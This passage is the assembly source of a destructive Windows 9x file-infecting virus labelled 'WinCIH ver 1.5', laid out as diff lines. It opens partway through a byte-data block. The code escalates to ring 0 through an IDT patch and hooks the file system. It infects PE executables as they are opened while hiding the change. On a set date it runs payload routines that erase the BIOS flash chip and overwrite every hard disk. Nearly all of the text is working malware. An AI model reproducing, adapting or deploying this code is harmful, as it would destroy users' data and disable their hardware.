000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h + db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h + db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h + db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h + db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h + db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 
000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h + db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h + db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + dd 00000000h, VirusSize + +OriginalAppEXE ENDS + +; **************************************************************************** +; * My Virus Game * +; **************************************************************************** + +; 
********************************************************* +; * Constant Define * +; ********************************************************* + +TRUE = 1 +FALSE = 0 + +DEBUG = TRUE + +IF DEBUG + + FirstKillHardDiskNumber = 82h + HookExceptionNumber = 06h + +ELSE + + FirstKillHardDiskNumber = 81h + HookExceptionNumber = 04h + +ENDIF + + +FileNameBufferSize = 7fh + +; ********************************************************* +; ********************************************************* + +VirusGame SEGMENT + + ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame + ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame + +; ********************************************************* +; * Ring3 Virus Game Initial Program * +; ********************************************************* + +MyVirusStart: + push ebp + +; ************************************* +; * Let's Modify Structured Exception * +; * Handing, Prevent Exception Error * +; * Occurrence, Especially in NT. * +; ************************************* + + lea eax, [esp-04h*2] + xor ebx, ebx + xchg eax, fs:[ebx] + call @0 +@0: + pop ebx + lea ecx, StopToRunVirusCode-@0[ebx] + push ecx + push eax + +; ************************************* +; * Let's Modify * +; * IDT(Interrupt Descriptor Table) * +; * to Get Ring0 Privilege... 
* +; ************************************* + + push eax ; + sidt [esp-02h] ; Get IDT Base Address + pop ebx ; + add ebx, HookExceptionNumber*08h+04h ; ZF = 0 + cli + mov ebp, [ebx] ; Get Exception Base + mov bp, [ebx-04h] ; Entry Point + lea esi, MyExceptionHook-@1[ecx] + push esi + mov [ebx-04h], si ; + shr esi, 16 ; Modify Exception + mov [ebx+02h], si ; Entry Point Address + pop esi + +; ************************************* +; * Generate Exception to Get Ring0 * +; ************************************* + + int HookExceptionNumber ; GenerateException +ReturnAddressOfEndException = $ + +; ************************************* +; * Merge All Virus Code Section * +; ************************************* + + push esi + mov esi, eax + +LoopOfMergeAllVirusCodeSection: + + mov ecx, [eax-04h] + rep movsb + sub eax, 08h + mov esi, [eax] + or esi, esi + jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 + jmp LoopOfMergeAllVirusCodeSection + +QuitLoopOfMergeAllVirusCodeSection: + + pop esi + +; ************************************* +; * Generate Exception Again * +; ************************************* + + int HookExceptionNumber ; GenerateException Again + +; ************************************* +; * Let's Restore * +; * Structured Exception Handing * +; ************************************* + +ReadyRestoreSE: + sti + xor ebx, ebx + jmp RestoreSE + +; ************************************* +; * When Exception Error Occurs, * +; * Our OS System should be in NT. * +; * So My Cute Virus will not * +; * Continue to Run, it Jmups to * +; * Original Application to Run. 
* +; ************************************* + +StopToRunVirusCode: +@1 = StopToRunVirusCode + + xor ebx, ebx + mov eax, fs:[ebx] + mov esp, [eax] + +RestoreSE: + pop dword ptr fs:[ebx] + pop eax + +; ************************************* +; * Return Original App to Execute * +; ************************************* + + pop ebp + push 00401000h ; Push Original +OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack + ret ; Return to Original App Entry Point + +; ********************************************************* +; * Ring0 Virus Game Initial Program * +; ********************************************************* + +MyExceptionHook: +@2 = MyExceptionHook + jz InstallMyFileSystemApiHook + +; ************************************* +; * Do My Virus Exist in System !? * +; ************************************* + + mov ecx, dr0 + jecxz AllocateSystemMemoryPage + add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException + +; ************************************* +; * Return to Ring3 Initial Program * +; ************************************* + +ExitRing0Init: + mov [ebx-04h], bp ; + shr ebp, 16 ; Restore Exception + mov [ebx+02h], bp ; + iretd + +; ************************************* +; * Allocate SystemMemory Page to Use * +; ************************************* + +AllocateSystemMemoryPage: + + mov dr0, ebx ; Set the Mark of My Virus Exist in System + push 00000000fh ; + push ecx ; + push 0ffffffffh ; + push ecx ; + push ecx ; + push ecx ; + push 000000001h ; + push 000000002h ; + int 20h ; VMMCALL _PageAllocate +_PageAllocate = $ ; + dd 00010053h ; Use EAX, ECX, EDX, and flags + add esp, 08h*04h + xchg edi, eax ; EDI = SystemMemory Start Address + lea eax, MyVirusStart-@2[esi] + iretd ; Return to Ring3 Initial Program + +; ************************************* +; * Install My File System Api Hook * +; ************************************* + +InstallMyFileSystemApiHook: + + lea eax, FileSystemApiHook-@6[edi] + + push eax ; + int 20h ; VXDCALL 
IFSMgr_InstallFileSystemApiHook +IFSMgr_InstallFileSystemApiHook = $ + dd 00400067h ; Use EAX, ECX, EDX, and flags + mov dr0, eax ; Save OldFileSystemApiHook Address + pop eax ; EAX = FileSystemApiHook Address + ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point + mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] + mov edx, [ecx] + mov OldInstallFileSystemApiHook-@3[eax], edx + ; Modify IFSMgr_InstallFileSystemApiHook Entry Point + lea eax, InstallFileSystemApiHook-@3[eax] + mov [ecx], eax + cli + jmp ExitRing0Init + +; ********************************************************* +; * Code Size of Merge Virus Code Section * +; ********************************************************* + +CodeSizeOfMergeVirusCodeSection = offset $ + +; ********************************************************* +; * IFSMgr_InstallFileSystemApiHook * +; ********************************************************* + +InstallFileSystemApiHook: + push ebx + call @4 ; +@4: ; + pop ebx ; mov ebx, offset FileSystemApiHook + add ebx, FileSystemApiHook-@4 ; + push ebx + int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook +IFSMgr_RemoveFileSystemApiHook = $ + dd 00400068h ; Use EAX, ECX, EDX, and flags + pop eax + ; Call Original IFSMgr_InstallFileSystemApiHook + ; to Link Client FileSystemApiHook + push dword ptr [esp+8] + call OldInstallFileSystemApiHook-@3[ebx] + pop ecx + push eax + ; Call Original IFSMgr_InstallFileSystemApiHook + ; to Link My FileSystemApiHook + push ebx + call OldInstallFileSystemApiHook-@3[ebx] + pop ecx + mov dr0, eax ; Adjust OldFileSystemApiHook Address + pop eax + pop ebx + ret + +; ********************************************************* +; * Static Data * +; ********************************************************* + +OldInstallFileSystemApiHook dd ? 
+ +; ********************************************************* +; * IFSMgr_FileSystemHook * +; ********************************************************* + +; ************************************* +; * IFSMgr_FileSystemHook Entry Point * +; ************************************* + +FileSystemApiHook: +@3 = FileSystemApiHook + + pushad + call @5 ; +@5: ; + pop esi ; mov esi, offset VirusGameDataStartAddress + add esi, VirusGameDataStartAddress-@5 + +; ************************************* +; * Is OnBusy !? * +; ************************************* + + test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) + jnz pIFSFunc ; goto pIFSFunc + +; ************************************* +; * Is OpenFile !? * +; ************************************* + + ; if ( NotOpenFile ) + ; goto prevhook + lea ebx, [esp+20h+04h+04h] + cmp dword ptr [ebx], 00000024h + jne prevhook + +; ************************************* +; * Enable OnBusy * +; ************************************* + + inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy + +; ************************************* +; * Get FilePath's DriveNumber, * +; * then Set the DriveName to * +; * FileNameBuffer. * +; ************************************* +; * Ex. If DriveNumber is 03h, * +; * DriveName is 'C:'. * +; ************************************* + + add esi, FileNameBuffer-@6 + push esi + mov al, [ebx+04h] + cmp al, 0ffh + je CallUniToBCSPath + add al, 40h + mov ah, ':' + mov [esi], eax + inc esi + inc esi + +; ************************************* +; * UniToBCSPath * +; ************************************* +; * This Service Converts * +; * a Canonicalized Unicode Pathname * +; * to a Normal Pathname in the * +; * Specified BCS Character Set. 
* +; ************************************* + +CallUniToBCSPath: + push 00000000h + push FileNameBufferSize + mov ebx, [ebx+10h] + mov eax, [ebx+0ch] + add eax, 04h + push eax + push esi + int 20h ; VXDCall UniToBCSPath +UniToBCSPath = $ + dd 00400041h + add esp, 04h*04h + +; ************************************* +; * Is FileName '.EXE' !? * +; ************************************* + + cmp [esi+eax-04h], 'EXE.' + pop esi + jne DisableOnBusy + +IF DEBUG + +; ************************************* +; * Only for Debug * +; ************************************* + + cmp [esi+eax-06h], 'KCUF' + jne DisableOnBusy + +ENDIF + +; ************************************* +; * Is Open Existing File !? * +; ************************************* + + ; if ( NotOpenExistingFile ) + ; goto DisableOnBusy + cmp word ptr [ebx+18h], 01h + jne DisableOnBusy + +; ************************************* +; * Get Attributes of the File * +; ************************************* + + mov ax, 4300h + int 20h ; VXDCall IFSMgr_Ring0_FileIO +IFSMgr_Ring0_FileIO = $ + dd 00400032h + jc DisableOnBusy + push ecx + +; ************************************* +; * Get IFSMgr_Ring0_FileIO Address * +; ************************************* + + mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] + mov edi, [edi] + +; ************************************* +; * Is Read-Only File !? 
* +; ************************************* + + test cl, 01h + jz OpenFile + +; ************************************* +; * Modify Read-Only File to Write * +; ************************************* + + mov ax, 4301h + xor ecx, ecx + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Open File * +; ************************************* + +OpenFile: + xor eax, eax + mov ah, 0d5h + xor ecx, ecx + xor edx, edx + inc edx + mov ebx, edx + inc ebx + call edi ; VXDCall IFSMgr_Ring0_FileIO + xchg ebx, eax ; mov ebx, FileHandle + +; ************************************* +; * Need to Restore * +; * Attributes of the File !? * +; ************************************* + + pop ecx + pushf + test cl, 01h + jz IsOpenFileOK + +; ************************************* +; * Restore Attributes of the File * +; ************************************* + + mov ax, 4301h + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Is Open File OK !? * +; ************************************* + +IsOpenFileOK: + popf + jc DisableOnBusy + +; ************************************* +; * Open File Already Succeed. ^__^ * +; ************************************* + + push esi ; Push FileNameBuffer Address to Stack + + pushf ; Now CF = 0, Push Flag to Stack + + add esi, DataBuffer-@7 ; mov esi, offset DataBuffer + +; *************************** +; * Get OffsetToNewHeader * +; *************************** + + xor eax, eax + mov ah, 0d6h + ; For Doing Minimal VirusCode's Length, + ; I Save EAX to EBP. + mov ebp, eax + push 00000004h + pop ecx + push 0000003ch + pop edx + call edi ; VXDCall IFSMgr_Ring0_FileIO + mov edx, [esi] + +; *************************** +; * Get 'PE\0' Signature * +; * of ImageFileHeader, and * +; * Infected Mark. * +; *************************** + + dec edx + mov eax, ebp + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Is PE !? 
* +; *************************** +; * Is the File * +; * Already Infected !? * +; *************************** +; * WinZip Self-Extractor * +; * doesn't Have Infected * +; * Mark Because My Virus * +; * doesn't Infect it. * +; *************************** + + cmp dword ptr [esi], 00455000h + jne CloseFile + +; ************************************* +; * The File is ^o^ * +; * PE(Portable Executable) indeed. * +; ************************************* +; * The File isn't also Infected. * +; ************************************* + +; ************************************* +; * Start to Infect the File * +; ************************************* +; * Registers Use Status Now : * +; * * +; * EAX = 04h * +; * EBX = File Handle * +; * ECX = 04h * +; * EDX = 'PE\0\0' Signature of * +; * ImageFileHeader Pointer's * +; * Former Byte. * +; * ESI = DataBuffer Address ==> @8 * +; * EDI = IFSMgr_Ring0_FileIO Address * +; * EBP = D600h ==> Read Data in File * +; ************************************* +; * Stack Dump : * +; * * +; * ESP => ------------------------- * +; * | EFLAG(CF=0) | * +; * ------------------------- * +; * | FileNameBufferPointer | * +; * ------------------------- * +; * | EDI | * +; * ------------------------- * +; * | ESI | * +; * ------------------------- * +; * | EBP | * +; * ------------------------- * +; * | ESP | * +; * ------------------------- * +; * | EBX | * +; * ------------------------- * +; * | EDX | * +; * ------------------------- * +; * | ECX | * +; * ------------------------- * +; * | EAX | * +; * ------------------------- * +; * | Return Address | * +; * ------------------------- * +; ************************************* + + push ebx ; Save File Handle + push 00h ; Set VirusCodeSectionTableEndMark + +; *************************** +; * Let's Set the * +; * Virus' Infected Mark * +; *************************** + + push 01h ; Size + push edx ; Pointer of File + push edi ; Address of Buffer + +; *************************** +; * Save ESP Register * +; 
*************************** + + mov dr1, esp + +; *************************** +; * Let's Set the * +; * NewAddressOfEntryPoint * +; * ( Only First Set Size ) * +; *************************** + + push eax ; Size + +; *************************** +; * Let's Read * +; * Image Header in File * +; *************************** + + mov eax, ebp + mov cl, SizeOfImageHeaderToRead + add edx, 07h ; Move EDX to NumberOfSections + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Let's Set the * +; * NewAddressOfEntryPoint * +; * ( Set Pointer of File, * +; * Address of Buffer ) * +; *************************** + + lea eax, (AddressOfEntryPoint-@8)[edx] + push eax ; Pointer of File + lea eax, (NewAddressOfEntryPoint-@8)[esi] + push eax ; Address of Buffer + +; *************************** +; * Move EDX to the Start * +; * of SectionTable in File * +; *************************** + + movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] + lea edx, [eax+edx+12h] + +; *************************** +; * Let's Get * +; * Total Size of Sections * +; *************************** + + mov al, SizeOfScetionTable + ; I Assume NumberOfSections <= 0ffh + mov cl, (NumberOfSections-@8)[esi] + mul cl + +; *************************** +; * Let's Set Section Table * +; *************************** + + ; Move ESI to the Start of SectionTable + lea esi, (StartOfSectionTable-@8)[esi] + push eax ; Size + push edx ; Pointer of File + push esi ; Address of Buffer + +; *************************** +; * The Code Size of Merge * +; * Virus Code Section and * +; * Total Size of Virus * +; * Code Section Table Must * +; * be Small or Equal the * +; * Unused Space Size of * +; * Following Section Table * +; *************************** + + inc ecx + push ecx ; Save NumberOfSections+1 + shl ecx, 03h + push ecx ; Save TotalSizeOfVirusCodeSectionTable + + add ecx, eax + add ecx, edx + sub ecx, (SizeOfHeaders-@9)[esi] + not ecx + inc ecx + ; Save My Virus First Section Code + ; Size of Following 
Section Table... + ; ( Not Include the Size of Virus Code Section Table ) + push ecx + xchg ecx, eax ; ECX = Size of Section Table + ; Save Original Address of Entry Point + mov eax, (AddressOfEntryPoint-@9)[esi] + add eax, (ImageBase-@9)[esi] + mov (OriginalAddressOfEntryPoint-@9)[esi], eax + cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection + jl OnlySetInfectedMark + +; *************************** +; * Read All Section Tables * +; *************************** + + mov eax, ebp + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Full Modify the Bug : * +; * WinZip Self-Extractor * +; * Occurs Error... * +; *************************** +; * So When User Opens * +; * WinZip Self-Extractor, * +; * Virus Doesn't Infect it.* +; *************************** +; * First, Virus Gets the * +; * PointerToRawData in the * +; * Second Section Table, * +; * Reads the Section Data, * +; * and Tests the String of * +; * 'WinZip(R)'...... * +; *************************** + + xchg eax, ebp + push 00000004h + pop ecx + push edx + mov edx, (SizeOfScetionTable+PointerToRawData-@9)[esi] + add edx, 12h + call edi ; VXDCall IFSMgr_Ring0_FileIO + cmp dword ptr [esi], 'piZniW' + je NotSetInfectedMark + pop edx + +; *************************** +; * Let's Set Total Virus * +; * Code Section Table * +; *************************** + + ; EBX = My Virus First Section Code + ; Size of Following Section Table + pop ebx + pop edi ; EDI = TotalSizeOfVirusCodeSectionTable + pop ecx ; ECX = NumberOfSections+1 + push edi ; Size + add edx, ebp + push edx ; Pointer of File + add ebp, esi + push ebp ; Address of Buffer + +; *************************** +; * Set the First Virus * +; * Code Section Size in * +; * VirusCodeSectionTable * +; *************************** + + lea eax, [ebp+edi-04h] + mov [eax], ebx + +; *************************** +; * Let's Set My Virus * +; * First Section Code * +; *************************** + + push ebx ; Size + add edx, edi + push edx ; 
Pointer of File + lea edi, (MyVirusStart-@9)[esi] + push edi ; Address of Buffer + +; *************************** +; * Let's Modify the * +; * AddressOfEntryPoint to * +; * My Virus Entry Point * +; *************************** + + mov (NewAddressOfEntryPoint-@9)[esi], edx + +; *************************** +; * Setup Initial Data * +; *************************** + + lea edx, [esi-SizeOfScetionTable] + mov ebp, offset VirusSize + jmp StartToWriteCodeToSections + +; *************************** +; * Write Code to Sections * +; *************************** + +LoopOfWriteCodeToSections: + + add edx, SizeOfScetionTable + mov ebx, (SizeOfRawData-@9)[edx] + sub ebx, (VirtualSize-@9)[edx] + jbe EndOfWriteCodeToSections + push ebx ; Size + sub eax, 08h + mov [eax], ebx + mov ebx, (PointerToRawData-@9)[edx] + add ebx, (VirtualSize-@9)[edx] + push ebx ; Pointer of File + push edi ; Address of Buffer + mov ebx, (VirtualSize-@9)[edx] + add ebx, (VirtualAddress-@9)[edx] + add ebx, (ImageBase-@9)[esi] + mov [eax+4], ebx + mov ebx, [eax] + add (VirtualSize-@9)[edx], ebx + + ; Section contains initialized data ==> 00000040h + ; Section can be Read. 
==> 40000000h
+ or (Characteristics-@9)[edx], 40000040h
+
+StartToWriteCodeToSections:
+
+ sub ebp, ebx
+ jbe SetVirusCodeSectionTableEndMark
+ add edi, ebx ; Move Address of Buffer
+
+EndOfWriteCodeToSections:
+
+ loop LoopOfWriteCodeToSections
+
+; ***************************
+; * Only Set Infected Mark *
+; ***************************
+
+OnlySetInfectedMark:
+ mov esp, dr1
+ jmp WriteVirusCodeToFile
+
+; ***************************
+; * Not Set Infected Mark *
+; ***************************
+
+NotSetInfectedMark:
+ add esp, 3ch
+ jmp CloseFile
+
+; ***************************
+; * Set Virus Code *
+; * Section Table End Mark *
+; ***************************
+
+SetVirusCodeSectionTableEndMark:
+
+ ; Adjust Size of Virus Section Code to Correct Value
+ add [eax], ebp
+ add [esp+08h], ebp
+
+ ; Set End Mark
+ xor ebx, ebx
+ mov [eax-04h], ebx
+
+; ***************************
+; * When VirusGame Calls *
+; * VxDCall, VMM Modifies *
+; * the 'int 20h' and the *
+; * 'Service Identifier' *
+; * to 'Call [XXXXXXXX]'. *
+; ***************************
+; * Before Writing My Virus *
+; * to File, I Must Restore *
+; * them First. ^__^ *
+; ***************************
+
+ lea eax, (LastVxDCallAddress-2-@9)[esi]
+ mov cl, VxDCallTableSize
+
+LoopOfRestoreVxDCallID:
+ mov word ptr [eax], 20cdh
+ mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi]
+ mov [eax+2], edx
+ movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi]
+ sub eax, edx
+ loop LoopOfRestoreVxDCallID
+
+; ***************************
+; * Let's Write *
+; * Virus Code to the File *
+; ***************************
+
+WriteVirusCodeToFile:
+ mov eax, dr1
+ mov ebx, [eax+10h]
+ mov edi, [eax]
+
+LoopOfWriteVirusCodeToFile:
+
+ pop ecx
+ jecxz SetFileModificationMark
+ mov esi, ecx
+ mov eax, 0d601h
+ pop edx
+ pop ecx
+ call edi ; VXDCall IFSMgr_Ring0_FileIO
+ jmp LoopOfWriteVirusCodeToFile
+
+; ***************************
+; * Let's Set CF = 1 ==> *
+; * Need to Restore File *
+; * Modification Time *
+; ***************************
+
+SetFileModificationMark:
+ pop ebx
+ pop eax
+ stc ; Enable CF(Carry Flag)
+ pushf
+
+; *************************************
+; * Close File *
+; *************************************
+
+CloseFile:
+ xor eax, eax
+ mov ah, 0d7h
+ call edi ; VXDCall IFSMgr_Ring0_FileIO
+
+; *************************************
+; * Need to Restore File Modification *
+; * Time !? *
+; *************************************
+
+ popf
+ pop esi
+ jnc IsKillComputer
+
+; *************************************
+; * Restore File Modification Time *
+; *************************************
+
+ mov ebx, edi
+ mov ax, 4303h
+ mov ecx, (FileModificationTime-@7)[esi]
+ mov edi, (FileModificationTime+2-@7)[esi]
+ call ebx ; VXDCall IFSMgr_Ring0_FileIO
+
+; *************************************
+; * Disable OnBusy *
+; *************************************
+
+DisableOnBusy:
+ dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy
+
+; *************************************
+; * Call Previous FileSystemApiHook *
+; *************************************
+
+prevhook:
+ popad
+ mov eax, dr0 ;
+ jmp [eax] ; Jump to prevhook
+
+; *************************************
+; * Call the Function that the IFS *
+; * Manager Would Normally Call to *
+; * Implement this Particular I/O *
+; * Request. *
+; *************************************
+
+pIFSFunc:
+ mov ebx, esp
+ push dword ptr [ebx+20h+04h+14h] ; Push pioreq
+ call [ebx+20h+04h] ; Call pIFSFunc
+ pop ecx ;
+ mov [ebx+1ch], eax ; Modify EAX Value in Stack
+
+; ***************************
+; * After Calling pIFSFunc, *
+; * Get Some Data from the *
+; * Returned pioreq. *
+; ***************************
+
+ cmp dword ptr [ebx+20h+04h+04h], 00000024h
+ jne QuitMyVirusFileSystemHook
+
+; *****************
+; * Get the File *
+; * Modification *
+; * Date and Time *
+; * in DOS Format.*
+; *****************
+
+ mov eax, [ecx+28h]
+ mov (FileModificationTime-@6)[esi], eax
+
+; ***************************
+; * Quit My Virus' *
+; * IFSMgr_FileSystemHook *
+; ***************************
+
+QuitMyVirusFileSystemHook:
+
+ popad
+ ret
+
+; *************************************
+; * Kill Computer !? ... *^_^* *
+; *************************************
+
+IsKillComputer:
+ ; Get Now Day from BIOS CMOS
+ mov al, 07h
+ out 70h, al
+ in al, 71h
+ xor al, 01h ; ??/26/????
+
+IF DEBUG
+ jmp DisableOnBusy
+ELSE
+ jnz DisableOnBusy
+ENDIF
+
+; **************************************
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; * Kill Kill Kill Kill Kill Kill Kill *
+; **************************************
+
+; ***************************
+; * Kill BIOS EEPROM *
+; ***************************
+
+ mov bp, 0cf8h
+ lea esi, IOForEEPROM-@7[esi]
+
+; ***********************
+; * Show BIOS Page in *
+; * 000E0000 - 000EFFFF *
+; * ( 64 KB ) *
+; ***********************
+
+ mov edi, 8000384ch
+ mov dx, 0cfeh
+ cli
+ call esi
+
+; ***********************
+; * Show BIOS Page in *
+; * 000F0000 - 000FFFFF *
+; * ( 64 KB ) *
+; ***********************
+
+ mov di, 0058h
+ dec edx ; and al,0fh
+ mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h
+ call esi
+
+; ***********************
+; * Show the BIOS Extra *
+; * ROM Data in Memory *
+; * 000E0000 - 000E01FF *
+; * ( 512 Bytes ) *
+; * , and the Section *
+; * of Extra BIOS can *
+; * be Writted... *
+; ***********************
+
+ lea ebx, EnableEEPROMToWrite-@10[esi]
+ mov eax, 0e5555h
+ mov ecx, 0e2aaah
+ call ebx
+ mov byte ptr [eax], 60h
+ push ecx
+ loop $
+
+; ***********************
+; * Kill the BIOS Extra *
+; * ROM Data in Memory *
+; * 000E0000 - 000E007F *
+; * ( 80h Bytes ) *
+; ***********************
+
+ xor ah, ah
+ mov [eax], al
+
+ xchg ecx, eax
+ loop $
+
+; ***********************
+; * Show and Enable the *
+; * BIOS Main ROM Data *
+; * 000E0000 - 000FFFFF *
+; * ( 128 KB ) *
+; * can be Writted... *
+; ***********************
+
+ mov eax, 0f5555h
+ pop ecx
+ mov ch, 0aah
+ call ebx
+ mov byte ptr [eax], 20h
+
+ loop $
+
+; ***********************
+; * Kill the BIOS Main *
+; * ROM Data in Memory *
+; * 000FE000 - 000FE07F *
+; * ( 80h Bytes ) *
+; ***********************
+
+ mov ah, 0e0h
+ mov [eax], al
+
+; ***********************
+; * Hide BIOS Page in *
+; * 000F0000 - 000FFFFF *
+; * ( 64 KB ) *
+; ***********************
+ ; or al,10h
+ mov word ptr (BooleanCalculateCode-@10)[esi], 100ch
+ call esi
+
+; ***************************
+; * Kill All HardDisk *
+; ***************************************************
+; * IOR Structure of IOS_SendCommand Needs *
+; ***************************************************
+; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
+; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
+; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
+; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
+; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
+; ***************************************************
+
+KillHardDisk:
+ xor ebx, ebx
+ mov bh, FirstKillHardDiskNumber
+ push ebx
+ sub esp, 2ch
+ push 0c0001000h
+ mov bh, 08h
+ push ebx
+ push ecx
+ push ecx
+ push ecx
+ push 40000501h
+ inc ecx
+ push ecx
+ push ecx
+ mov esi, esp
+ sub esp, 0ach
+
+LoopOfKillHardDisk:
+ int 20h
+ dd 00100004h ; VXDCall IOS_SendCommand
+ cmp word ptr [esi+06h], 0017h
+ je KillNextDataSection
+
+ChangeNextHardDisk:
+ inc byte ptr [esi+4dh]
+ jmp LoopOfKillHardDisk
+
+KillNextDataSection:
+ add dword ptr [esi+10h], ebx
+ mov byte ptr [esi+4dh], FirstKillHardDiskNumber
+ jmp LoopOfKillHardDisk
+
+; ***************************
+; * Enable EEPROM to Write *
+; ***************************
+
+EnableEEPROMToWrite:
+ mov [eax], cl
+ mov [ecx], al
+ mov byte ptr [eax], 80h
+ mov [eax], cl
+ mov [ecx], al
+ ret
+
+; ***************************
+; * IO for EEPROM *
+; ***************************
+
+IOForEEPROM:
+@10 = IOForEEPROM
+
+ xchg eax, edi
+ xchg edx, ebp
+ out dx, eax
+ xchg eax, edi
+ xchg edx, ebp
+ in al, dx
+
+BooleanCalculateCode = $
+ or al, 44h
+ xchg eax, edi
+ xchg edx, ebp
+ out dx, eax
+ xchg eax, edi
+ xchg edx, ebp
+ out dx, al
+ ret
+
+; *********************************************************
+; * Static Data *
+; *********************************************************
+
+LastVxDCallAddress = IFSMgr_Ring0_FileIO
+VxDCallAddressTable db 00h
+ db IFSMgr_RemoveFileSystemApiHook-_PageAllocate
+ db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
+ db IFSMgr_Ring0_FileIO-UniToBCSPath
+VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h
+VxDCallTableSize = ($-VxDCallIDTable)/04h
+
+; *********************************************************
+; * Virus Version Copyright *
+; *********************************************************
+
+VirusVersionCopyright db 'WinCIH ver 1.5 by TATUNG, Thailand'
+
+; *********************************************************
+; * Virus Size *
+; *********************************************************
+
+VirusSize = $
+; + SizeOfVirusCodeSectionTableEndMark(04h)
+; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
+; + SizeOfTheFirstVirusCodeSectionTable(04h)
+
+; *********************************************************
+; * Dynamic Data *
+; *********************************************************
+
+VirusGameDataStartAddress = VirusSize
+@6 = VirusGameDataStartAddress
+OnBusy db 0
+FileModificationTime dd ?
+
+FileNameBuffer db FileNameBufferSize dup(?)
+@7 = FileNameBuffer
+
+DataBuffer = $
+@8 = DataBuffer
+NumberOfSections dw ?
+TimeDateStamp dd ?
